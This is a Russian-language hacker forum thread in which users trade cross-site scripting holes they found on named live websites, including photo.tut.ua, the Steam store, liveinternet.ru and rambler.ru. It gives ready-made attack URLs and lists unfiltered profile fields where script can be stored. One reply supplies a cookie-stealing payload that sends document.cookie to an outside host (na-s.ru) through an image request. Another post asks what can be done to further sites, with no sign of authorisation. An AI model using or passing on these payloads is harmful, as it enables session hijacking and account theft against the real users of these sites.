Кстати еще нашел пасивную XSS на TUT.UA http://photo.tut.ua/search/ - в строке поиска пишем "><script>alert()</script> ))) Ппц (Еси не вв тему просто хотел дополнить ХSS - iddqd ))
Хммм обьясните плиз я вот на сайте зарегался ну как бы свой снифер вставил! Мой логин kuzya так вот еси мну в поиске поискать ну набрав мой ник kuzya то ничего не находит и не какой Xss не вылазиет! А вот мну куки отсылаются!! Чот я не понял)))Обьясните!http://photo.tut.ua/search/?q=kuzya&w=0&type=all - ВОт!!Ниче нету же)
BanQui, http://photo.tut.ua/search/?q='"/><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>&w=0&type=all
Antimir.com.ua - какбы социалка+знакомства При заполнении анкеты в основном блоке "О себе" не фильтруется поле "Я ищу"(нужно указать"Другое" и вставить свой кодес). Блок "Интересы": Ваши интересы=>и еще мне нравится=>кодес; Чем Вы займетесь в свободное время=>а также=>кодес; Занятия спортом=>другое=>кодес; Стили музыки=>другое=>кодес. Code: http://antimir.com.ua/~ligendo
LiveInternet.ru При заполнении анкеты не фильтруются поля "Имя", "Фамилия" и "Отчество". Code: http://www.liveinternet.ru/users/ligendo/profile/
steampowered.com http://store.steampowered.com/news/?appids=%22%3E%3Cscript%3Ealert(%27XXS%20by%20diznt%27)%3C/script%3E http://store.steampowered.com/search/?genre=RPG&category1=%22%3E%3Cscript%3Ealert(%27XXS%20by%20diznt%27)%3C/script%3E http://store.steampowered.com/news/?term="><script>alert('XSS by diznt')<%2Fscript> XSS найдены мною лично... (думаю +++ поставите)
mail.oboz.ua Не фильтруется тело(!) письма, в отличии от темы... Как в режиме текста, так и в html. uaportal.com "Дерево друзей"- заполняем информацию о себе. Ничего не фильтруется Code: http://drevo.uaportal.com/userinfo/ligendo
Просто смешно, написали свой форум с огромным кол-вом уязвимостей. dropzone.by парашютный форум, - настоящие экстрималы))) тут
planeta.rambler.ru При просмотре профиля не фильтруется поле "Ник". Code: http://planeta.rambler.ru/users/nepoxek/ http://planeta.rambler.ru/users/nepoxek/profile/
народ а можно-ли че с этим сайтом сделать http://www.asto.ru/ или http://www.happysvadba.ru/cat_item.php?iid=1078 и что можно вообще сделать с этим?